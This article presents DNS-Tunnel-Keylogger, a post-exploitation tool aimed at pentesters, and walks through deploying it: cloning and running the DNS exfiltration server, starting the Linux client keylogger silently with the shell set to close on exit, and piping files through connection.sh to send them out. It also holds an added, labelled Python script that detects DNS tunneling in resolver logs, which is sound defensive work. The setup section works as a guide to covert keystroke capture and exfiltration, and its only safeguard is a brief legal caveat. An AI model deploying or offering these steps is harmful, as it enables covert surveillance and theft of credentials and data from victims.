DNS Tunnel Keylogger – An Offensive Post-Exploitation Tool For Pentesters

A new keylogging server and client tool has been released on GitHub for pentesters. The tool uses DNS tunneling to transmit keystrokes through firewalls, potentially evading detection.

The tool, DNS-Tunnel-Keylogger, is designed for post-exploitation activities by pentesters and emphasizes lightweight exfiltration and persistence to reduce the chances of being discovered by security systems.


The server component of the tool is written in Python 3 and requires the installation of dependencies via pip.

It operates by default on UDP port 53, but users can specify a different port using the -p flag. The server's IP address is used in SOA and NS records to allow other nameservers to discover the server.

Users are advised to set their domain's nameservers to custom DNS and point them to the exfiltration server's IP address, effectively setting glue records.

DNS tunneling is a technique for encoding the data of other applications or protocols in DNS queries and responses.

It can be particularly useful for post-exploitation data extraction while avoiding detection and firewall restrictions.
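Added detection example (not part of the tool or the original article): a small Python script that scans constructed DNS query log lines and flags base domains that receive many distinct, long or high-entropy subdomain names, which is the traffic pattern DNS tunneling produces. The log format, the thresholds and the domain names are assumptions; repeated identical queries are collapsed, matching the duplicate-request behaviour the article describes.

```python
import math
from collections import Counter, defaultdict

# Constructed sample DNS query log ("<time> <client_ip> <qtype> <qname>"); the
# hex-looking labels under exfil.example.net imitate tunnelled data.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 A mail.example.com
10:00:03 10.0.0.7 A 6a6f686e20646f65.k7.exfil.example.net
10:00:03 10.0.0.7 A 3132333420616263.k8.exfil.example.net
10:00:04 10.0.0.7 A 71776572747975696f70.k9.exfil.example.net
10:00:05 10.0.0.7 A 7a78637662.k10.exfil.example.net
10:00:06 10.0.0.9 A cdn.example.org
"""

def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty or uniform string)."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def base_domain(qname, depth=2):
    # Last `depth` labels of the name: a simplification of the registrable domain.
    return ".".join(qname.rstrip(".").split(".")[-depth:])

def analyse(log_text, min_names=3, len_threshold=20.0, entropy_threshold=3.5):
    """Group queries by base domain and return {domain: stats} for domains with at
    least `min_names` distinct names whose average subdomain length exceeds
    `len_threshold` or whose leftmost labels average more entropy than
    `entropy_threshold`. Repeated identical queries collapse into one name."""
    per_domain = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:          # skip blank or malformed lines
            continue
        qname = parts[3].lower()
        per_domain[base_domain(qname)].add(qname)
    flagged = {}
    for dom, names in per_domain.items():
        if len(names) < min_names:  # too few distinct names to judge
            continue
        subs = [name[: -(len(dom) + 1)] for name in names]   # strip ".<dom>"
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s.split(".")[0]) for s in subs) / len(subs)
        if avg_len > len_threshold or avg_ent > entropy_threshold:
            flagged[dom] = {"names": len(names), "avg_len": avg_len, "avg_entropy": avg_ent}
    return flagged
```

Tune the thresholds against a baseline of your own resolver logs before alerting on them; CDNs and some telemetry services also generate long, random-looking names.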

Prerequisites

  • Knowledge of DNS and networking concepts
  • Familiarity with Python and Bash scripting
  • A Linux environment for the keylogger client
  • Python3 installed on the server

On the client side, the Linux keylogger consists of two bash scripts. The connection.sh script is responsible for sending the captured keystrokes to the server, while the logger.sh script is used to start the keylogging process.

The keylogger can be started silently, and the shell can be closed upon exit to avoid returning to a non-keylogged state.


The developers note that the keylogger will not run in non-interactive shells and that the Windows Dns_Query_A function tends to send duplicate requests, though the server is designed to handle this by discarding repeated packets.

DNS Tunnel Keylogger – Server Setup

Step 1: Clone the Repository

First, clone the DNS-Tunnel-Keylogger repository from GitHub:

git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git

Step 2: Install Dependencies

Navigate to the cloned directory and install the required Python dependencies:

cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt

Step 3: Start the Server

To start the server, use the following command:

python3 main.py  

Replace the placeholders with the IP address of the server and with the domain for which the server is authoritative.

Server Options:

  • -h, --help: Show the help message and exit.
  • -p PORT, --port PORT: Specify a different port to listen on. By default, the server listens on UDP port 53.

Client Setup (Linux Keylogger)

Step 1: Prepare the Scripts

Make sure that logger.sh and connection.sh are in the same directory. These scripts capture the keystrokes and send them to the server.

Step 2: Start the Keylogger

To start the keylogger, run the following command:

./logger.sh  && exit

Replace the placeholder with the domain to send data to. The && exit will close the shell upon exit to prevent returning to a non-keylogged shell.

Keylogger Options:

  • -p path: Specify the path to the log file to listen to. By default, this is /tmp/.
  • -l: Run the logger with warnings and errors printed, which can be helpful for debugging.

Additional Information

Manual Data Transmission

If you need to send data, such as a file, manually, you can pipe the data to the connection.sh script, which will establish a connection and send the data.

Security Considerations

If used without proper authorization, a keylogger and DNS tunneling may be considered malicious and illegal in many jurisdictions. Make sure that you are permitted to use these tools in your environment and follow all relevant legal and ethical guidelines.

Troubleshooting

  • If you encounter issues, remove the &> /dev/null from the keylogger command to show error messages.
  • Check the server's firewall settings to make sure the DNS port (default 53) is open for incoming and outgoing connections.
  • Verify that the domain used is correctly configured and that the server is set as authoritative for it.

This guide provides the steps to set up a DNS tunneling keylogger for covert keystroke exfiltration. Be sure to use this tool responsibly and within the law.